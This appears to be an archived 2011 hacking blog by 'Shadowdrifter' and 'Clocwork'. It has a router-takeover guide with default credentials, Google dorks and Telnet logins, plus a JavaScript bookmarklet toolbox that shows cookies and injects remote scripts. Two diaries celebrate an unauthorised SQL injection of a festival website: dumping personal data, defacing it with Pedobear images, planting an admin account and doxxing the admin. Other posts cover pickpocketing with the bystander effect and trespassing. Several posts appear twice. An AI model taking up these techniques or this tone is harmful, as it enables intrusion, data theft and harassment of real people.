Todays post is on router hacking. I am not going very indepth on how
to hack routers. I will just be going over a few ways to find unsecure routers, and poorly configured routers
The simplest way is to just gain access to the network, and go commonly to
192.168.1.1 for the router page. You will encounter routers without passwords, but you should learn some of the most common
default passwords for routers just in case.
Common default passwords for any router username:password:
admin:admin.
admin:password.
admin: no password.
nothing in either username nor password.
admin:guest
guest:password
Those few password combinations will be the most commonly used. I personally used admin:admin just the other day.
Now we have logged into router so what can we do? Well the first thing we can do is enable remote management ( Remote management is the ability to control the router from a remote location); it is different
for each router, and some do not even have the option. If you do happen to find the option; you will need to change the default
password, and make sure you allow your I.P address to connect. This is all very self explanatory when you are familiar with routers.
By the end of this post you will be well on your way to becoming an expert at router configuration.
Now its easy to find routers from just finding secure, and unsecure wireless networks to try and access. There are a lot of
routers that web interfaces are actually indexed in Google! So with a simple Google dork we can find dozens even hundreds of unsecured routers
just waiting for someone to experiment with.
Google dorks to find routers:
intitle:"SpeedStream * Management Interface" ( Speed Stream routers )
intitle:"Setup Home" "You will need * log in before * * change * settings" ( Belkin routers )
intitle: "actiontec" main setup status " Copyright 2001 Actiontec Electronics Inc"
Those three dorks should keep you busy for quite some time. Now there is one more method that is hit, and miss really.
If you happen to find a target. Port scan them, and look for port 23 which is by default Telnet. There are a lot of off the shelves routers with telnet
active with only the default passwords in place. Which are very similar to the default router passwords except for a select few.
Default Telnet router passwords:
guest:guest
guest:password
user:guest
admin:guest
That is all for now; may your blades stay sharp, your mind sharper! Shadowdrifter.
Saturday, April 30, 2011
Using the Bystander Effect
The term bystander effect refers to the phenomenon in which the greater the number of people present, the less likely people are to help a person in distress.
- Darley, J. M. & LatanĂ©, B. (1969). Bystander “apathy.” American Scientist, 57, 244-268.
The Bystander Effect, although a phenomenon, can have some practical use in Social Engineering.
PLEASE NOTE: This effect will not happen every single time as there are good people in this world that are willing to help those in distress. We do not condone using this for illegal purposes, this post is only for information about psychological phenomenon.
Standard tests done by many psychologists involve the use of an injured victim laying in the middle of a busy side-walk. Passers-by simply ignore the injured person and continue walking no matter how much the person in distress is moaning. Occasionally, someone will confront the injured victim and ask if he or she needs any assistance. The number of people that actually help is very slim when compared to the number of people that simply continue walking.
Most psychologists say this is because people are lazy, other psychologists say that its because no one else sees the distressed person as a priority, so it must not be that big of a deal. Others, including myself (even though I'm not a psychologist) say that they simply avoid the distressed person because they think the person could be pulling a con. However, keep all of these points in mind, as they could be useful for a Social Engineer.
Lets say someone gets pick-pocketed. They start to fuss, they make a big commotion, and they tell people to stop the pickpocket. Now lets say that you had a group of people just walk by the distressed person completely ignoring him. There is a high chance that everyone else around the distressed person would do absolutely nothing simply because no one else was doing anything.
In theory, a group of pick-pockets could go around and steal purses, wallets, sunglasses etc. in the most non-secretive way possible and they would be able to get away with it (so long as the victim doesn't start chasing after the pick-pocket).
A Social Engineer can use this effect in many ways to get away with certain crimes. The biggest factor is the number of people that the Social Engineer has with him. If there's a smaller number of people, the less likely it is that he will get away with his con. The larger the number of people, the easier it will be to get away with it.
So ask yourself, if you saw someone in distress, would you help them? What if no one else was helping them, would you still help them, or would you just walk away?
Thanks for reading,
- Clocwork
Friday, April 29, 2011
PODCAST : Episode Three - Phreaking
In this podcast we discuss different types of phreaking methods, and you get to hear a prime example of Social Engineering from Ian.
Clocwork Hack Diary : Random Mischief Part One
Posted From My Droid
Thanks for reading,
-Clocwork
P.S. That guy stared at me the whole time I wrote that last message, now his kid is staring at me. Oh well, I just needed some water
I feel like I've been getting too soft lately, like I haven't done anything really mischeivious. So, I've decided that I'm going to be doing random acts of mischief until I'm satisfied. Currently, I'm seated in a lawn chair on the porch of another person's house smoking a cigar and watching some birds fight over seed in a bird feeder. To make it more interesting, the person doesn't know I'm here, and I don't know the person at all. I hope they don't show up, but, I need some water, and I know where to get it.
Now I'm seated in a chair at some private pool area. Just got a drink of water from the water fountain out here. Some just yelled at me and told me to leave, I'm telling him I needed some water. Walking over the water fountain again. Water just shot in my face, lol. Just got some water, the guy is still staring at me. About to hop the fence and continue with my running. Since today is Friday and tomorrow is Saturday (and Sunday comes afterwards, Rebecca Black reference bitches) I'll probably do some more mischief then. But, I gotta get home and upload the next podcast, gotta run about 3 miles back and then I'll post it.
Thanks for reading,
-Clocwork
P.S. That guy stared at me the whole time I wrote that last message, now his kid is staring at me. Oh well, I just needed some water
Thursday, April 28, 2011
Clocwork Hack Diary : The Festival
*Sorry for this post being a lot later than Shadow's. Been busy with some other stuff and never really got down to writing this one.*
It started off like any other normal Sunday, woke up late, did some stuff, and then sat down at my computer and got on Skype. I saw a message from Shadow talking about how he found some vulnerable website. He messaged me the website and I saw that it was vulnerable to SQLi. After a little pen-testing on the site, we saw that the only vulnerability on the site was SQLi. So, we got down to business doing some different commands (of course the site had to be v.4 right?).
We managed to find some tables, but unfortunately for us the tables for users and admins (if they existed) didn't have any information in them at all. I kept trying to find more and more tables and then it hit me to go ahead and try out the names of the different events (in case you couldn't tell by the title, this website was a site about a festival that happens every year, the site apparently is done by volunteers, go figure, and everyone in the festival is a volunteer). Sure enough, the names of the events gave us a lot of information: emails, addresses, and names for people in large organizations as well as the "Festival Queen" and some country music stars (yay.........).
After extracting basically the entire database in about 10 minutes, Shadow messages me saying that the admin of the site has a vulnerable password. In fact, the password was the first name of the festival (ie. if the festival name is Lorem Ipsum, the password was lorem). So, thanks to pure human stupidity, we were able to actually access the site.
Shadow didn't want to deface, but I wanted to screw around as I hadn't had a successful hack in a while. So, me being me, I posted some Pedobear images in the "Kids Festival" section, and added a nice page explaining how we did what we did, or really... how Shadow did what he did. After a little more screwing around, the admin finally erased the pages, and reverted the page back to normal, and changed everyone's password. Well, the admin forgot to change his own password, so we had access to the admin panel once again. This time I decided to send messages to everyone on the staff explaining how weak the security of the website was. This was fun, but the interesting part has yet to come.
Later on we got bored again and we created a new user on the page, gave him admin privelages, and then logged in to the site as him (because the admin finally had the sense to change the Wordpress passwords, but again we still had access to the site panel, which allows us to edit all of the events). As we were on the site, the admin started to change all of the user passwords to a random string of characters and he deleted our account, but their biggest flaw was when the fact that they had their logins as PHP Sessions with no timeout. So, if we wanted to, we could still be an admin today as long as we didn't log out (if the site were still up that is, the festival is over now though).
Since we knew the admin was at his computer, we decided to call the guy up and tell him about what we had done. We told him how we got in, and how he could fix it, and I also gave him some suggestions on his PHP code (which is funny because I'm only 17 and I'm definitely not an expert at PHP). To my surprise, he was actually very grateful for the help (or so it seemed) and he even offered us a job working on the site for next years festival. Guess good can pay off after all.
Thanks for reading, and I hope you enjoyed my first hack diary,
- Clocwork
It started off like any other normal Sunday, woke up late, did some stuff, and then sat down at my computer and got on Skype. I saw a message from Shadow talking about how he found some vulnerable website. He messaged me the website and I saw that it was vulnerable to SQLi. After a little pen-testing on the site, we saw that the only vulnerability on the site was SQLi. So, we got down to business doing some different commands (of course the site had to be v.4 right?).
We managed to find some tables, but unfortunately for us the tables for users and admins (if they existed) didn't have any information in them at all. I kept trying to find more and more tables and then it hit me to go ahead and try out the names of the different events (in case you couldn't tell by the title, this website was a site about a festival that happens every year, the site apparently is done by volunteers, go figure, and everyone in the festival is a volunteer). Sure enough, the names of the events gave us a lot of information: emails, addresses, and names for people in large organizations as well as the "Festival Queen" and some country music stars (yay.........).
After extracting basically the entire database in about 10 minutes, Shadow messages me saying that the admin of the site has a vulnerable password. In fact, the password was the first name of the festival (ie. if the festival name is Lorem Ipsum, the password was lorem). So, thanks to pure human stupidity, we were able to actually access the site.
Shadow didn't want to deface, but I wanted to screw around as I hadn't had a successful hack in a while. So, me being me, I posted some Pedobear images in the "Kids Festival" section, and added a nice page explaining how we did what we did, or really... how Shadow did what he did. After a little more screwing around, the admin finally erased the pages, and reverted the page back to normal, and changed everyone's password. Well, the admin forgot to change his own password, so we had access to the admin panel once again. This time I decided to send messages to everyone on the staff explaining how weak the security of the website was. This was fun, but the interesting part has yet to come.
Later on we got bored again and we created a new user on the page, gave him admin privelages, and then logged in to the site as him (because the admin finally had the sense to change the Wordpress passwords, but again we still had access to the site panel, which allows us to edit all of the events). As we were on the site, the admin started to change all of the user passwords to a random string of characters and he deleted our account, but their biggest flaw was when the fact that they had their logins as PHP Sessions with no timeout. So, if we wanted to, we could still be an admin today as long as we didn't log out (if the site were still up that is, the festival is over now though).
Since we knew the admin was at his computer, we decided to call the guy up and tell him about what we had done. We told him how we got in, and how he could fix it, and I also gave him some suggestions on his PHP code (which is funny because I'm only 17 and I'm definitely not an expert at PHP). To my surprise, he was actually very grateful for the help (or so it seemed) and he even offered us a job working on the site for next years festival. Guess good can pay off after all.
Thanks for reading, and I hope you enjoyed my first hack diary,
- Clocwork
PODCAST : Episode Two - Picking Your Target
Thanks to YouTube time restrictions, we had to divide this podcast up into three segments.
In this podcast we discuss how to pick a target for hacking, and also how to defend yourself from people like us.
Saturday, April 23, 2011
Javascript Injection Toolbox
This is for all of the skids out there that want some easy to use scripts. Recently shadow and I have been working on new methods to hack websites. I, Clocwork, have been focusing on learning Javascript since PHP is fairly easy to understand (although it is rather tedious). Well, I came across Javascript injection a little while ago and I realized that it could essentially be a great tool for me to use later on. So, without further adue, here is my Javascript Injection Toolbox.
Requirements :
- Computer with internet access
- Some basic knowledge of Javascript
Recommended :
- Firefox Browser
What is this toolbox?
Basically what this toolbox is, is it's a collection of scripts that make Javascript Injection a lot easier, and are stored in your browser's Bookmark Bar.
Example:
You can easily make your own scripts if you have knowledge of the language. I threw together my "Execute Remote JS" script in about a minute with very little knowledge of the language.
How do I Make it?
Go to your Bookmark Bar (Firefox) and right click on it. Now, select the option "New Folder." You can name this folder anything you want, I just named mine "Scripts" to save space (since my bookmark bar is actually rather full).
Now, right click on the Bookmark Bar again. Select the option "New Bookmark." You should see a box like this (the title will be different)
Example:
Requirements :
- Computer with internet access
- Some basic knowledge of Javascript
Recommended :
- Firefox Browser
What is this toolbox?
Basically what this toolbox is, is it's a collection of scripts that make Javascript Injection a lot easier, and are stored in your browser's Bookmark Bar.
Example:
You can easily make your own scripts if you have knowledge of the language. I threw together my "Execute Remote JS" script in about a minute with very little knowledge of the language.
How do I Make it?
Go to your Bookmark Bar (Firefox) and right click on it. Now, select the option "New Folder." You can name this folder anything you want, I just named mine "Scripts" to save space (since my bookmark bar is actually rather full).
Now, right click on the Bookmark Bar again. Select the option "New Bookmark." You should see a box like this (the title will be different)
Example:
In the "Name" field, you can put whatever you like, but, the location is the important part of this tutorial.
STOP (Please Read)
In case you don't know what you're doing, these bookmarks will allow you to execute Javascript scripts in your browser. To see what I mean, copy this
javascript:alert(document.cookie);
and put it in your URL bar right now. You should see something pop up with all of your cookie information. The use of this "javascript" command allows us to execute codes from our browser.
GO
Now, in the location field, you can put whatever script you wish to run. The idea of this toolbox is make tedious commands simple to use. For instance, if you're someone that likes to modify or spoof cookies, you would want a script that displays cookies for you (like the one I mentioned above).
Of course, these scripts can more interactive. For instance, here's a code I created to execute remote Javascript files from a site.
javascript:function%20display(){var%20location=prompt("WHAT%20IS%20THE%20LOCATION%20OF%20THE%20FILE?","127.0.0.1");%20document.write('<script%20type="text/javascript"%20src="'%20+%20location%20+%20'"></script>');}%20display();
This way, I can modify my remote file at any time without having to change my bookmark.
Execution
To execute these commands, you simply go to your target website, click on your "Scripts" folder and select the script you wish to run. It's simple, and it takes less time than physically typing in the commands yourself.
Conclusion
The rest of the toolbox is up to you. The first two codes were to get you going, but you can literally put any code you like (as long as its javascript) in these bookmarks. Again, the idea is to use flexible scripts (ones that you can run on any website, you just click once and the code is done), or advanced scripts (allows for more flexibility when you have more diverse sites)
So, I hope you enjoyed this idea, if someone else has had the same idea then awesome. I myself like to have things organized (even though my room is a mess) so I decided I'd go ahead and make a tutorial on this simple thing.
Thanks for reading,
- Clocwork
(check out the thread on HackForums http://www.hackforums.net/forumdisplay.php?fid=47 )
(check out the thread on HackForums http://www.hackforums.net/forumdisplay.php?fid=47 )
Friday, April 22, 2011
Hakipedia.
So a friend of mine showed me a "new" site, well new to me. If you read the title you may already know of the site, but for those who did not http://hakipedia.com/index.php/Hakipedia . It's very self explanatory it looks like Wikipedia, and functions like it as well. The subject is most obviously hacking and security. There is not a lot of articles yet, but I will be writing some and as I write them I will make a post to inform you of the new page. Lately I have been a bit obsessed with wifi, and War Driving. So the first article I wrote was on War Driving which is just to sum it up the act of searching out wireless access points to document or use for your own needs. In case you have trouble finding the War Driving article here ya go! http://hakipedia.com/index.php/War_Driving .
If you have any comments on it please message me on that site my name is Whitehaze.
Signed, Shadowdrifter.
If you have any comments on it please message me on that site my name is Whitehaze.
Signed, Shadowdrifter.
Monday, April 18, 2011
Shadowdrifter Hack Diary : The Festival
Shadowdrifter's Hack Diary: The Festival.
I had tested dozens of sites for vulnerabilities, finding none. When I was ready to give up
I stumbled across a site that was vulnerable to SQL. When I noticed that the SQL version was 4; I was filled
with anger and hatred. After many attempts at finding the user tables I decided my time was best spent getting
my normal four hours of sleep. I sent a message to my colleague Clocwork, and took my rest.
When I awoke from my slumber I had a message which simply said "Cool". I should have known Clocwork wouldn't care about it until he had seen it for himself. When he finally joined me in my endeavours we began to test the site for other vulnerabilities; finding none we focused solely on the sql injection.
After many creative attempts we finally found the user table. When we inspected in further I noticed that
there was no password column. Disappointed I continued to search through the table only finding the usernames.
So, distraught Clocwork and I retreated to ponder our attack. While he was working on the password
columns I decided "Hey, why not try password guessing". So I got a list of every username, and began my attack
I tried the name of the event, and presto! I was granted super administrator access. Dumbstruck by the adins
terrible password choice I paused to really contemplate his ignorance. Then I messaged my colleague to tell him the good news, and we planned our next move. Our plan was to simply email the admin explaing how we got in, but I decided to go with a different plan. So we created a deface page as a proof of concept then preceeded to dox the system admin. After finding his information we called his home, and had a good chat. Promptly he fixed the vulnerabilities, and changed the passwords to something much more difficult to guess. During our chat Clocwork and I were offered the opportunity to volunteer and do security for the festival next year. So sometimes doing a white hat hack has its benefits.
This is all for my hacking diary... For now. May your blade stay sharp, your mind sharper.
I had tested dozens of sites for vulnerabilities, finding none. When I was ready to give up
I stumbled across a site that was vulnerable to SQL. When I noticed that the SQL version was 4; I was filled
with anger and hatred. After many attempts at finding the user tables I decided my time was best spent getting
my normal four hours of sleep. I sent a message to my colleague Clocwork, and took my rest.
When I awoke from my slumber I had a message which simply said "Cool". I should have known Clocwork wouldn't care about it until he had seen it for himself. When he finally joined me in my endeavours we began to test the site for other vulnerabilities; finding none we focused solely on the sql injection.
After many creative attempts we finally found the user table. When we inspected in further I noticed that
there was no password column. Disappointed I continued to search through the table only finding the usernames.
So, distraught Clocwork and I retreated to ponder our attack. While he was working on the password
columns I decided "Hey, why not try password guessing". So I got a list of every username, and began my attack
I tried the name of the event, and presto! I was granted super administrator access. Dumbstruck by the adins
terrible password choice I paused to really contemplate his ignorance. Then I messaged my colleague to tell him the good news, and we planned our next move. Our plan was to simply email the admin explaing how we got in, but I decided to go with a different plan. So we created a deface page as a proof of concept then preceeded to dox the system admin. After finding his information we called his home, and had a good chat. Promptly he fixed the vulnerabilities, and changed the passwords to something much more difficult to guess. During our chat Clocwork and I were offered the opportunity to volunteer and do security for the festival next year. So sometimes doing a white hat hack has its benefits.
This is all for my hacking diary... For now. May your blade stay sharp, your mind sharper.
Friday, April 8, 2011
PODCAST : Episode One - Introductions
This is the introduction podcast where we explain who we are, what we do, and what this blog will be about. We hope you enjoy this blog and these podcasts!
Subscribe to:
Posts (Atom)